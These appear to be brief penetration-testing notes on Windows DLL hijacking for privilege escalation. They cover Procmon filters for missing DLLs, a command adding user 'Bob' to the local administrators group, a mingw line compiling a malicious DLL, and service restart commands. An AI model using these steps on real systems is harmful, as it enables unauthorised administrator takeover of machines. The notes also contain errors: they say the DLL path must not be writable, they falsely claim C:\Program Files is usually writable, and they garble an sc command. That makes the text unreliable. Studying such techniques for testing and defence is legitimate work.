DLL Hijacking

Overview

Dynamic Link Libraries are like executables but they aren't directly executable. They are shared libraries that contain functions, classes, resources, variables etc and they often run with executables.

When a Windows applications or services start up they look for their DLLs to run with.However if the DLL they're looking for doesn't exist or is missing AND the path to it is writable then we can get malicious with it.

Escalation via DLL Hijacking

Simulation Steps:

• Spin up Procmon

• Add filter of "Result is NAME NOT FOUND then Include"

• Add filter of "Path ends with .dll then Include"

• This will show all of the NAME NOT FOUND for DLLs

• We can exploit this if the location of the DLL isn't writable

• C:\Program Files is usually writable

• Start service and see if it's looking for a DLL to a writable path

• After ones been found can put a fake DLL there make it call to a malicious executable and pop a shell

In this case we can compile a malicious dll payload from a c program and make the dll add the user we're using the the local admin group or pop a shell

cmd.exe /k net localgroup administrators Bob /add  
x86_64-w64-mingw32-gcc windows_dll.c -shared -o hijackme.dll

Save to the writable location and restart service

sc stasc stop dllsvc
sc start dllsvc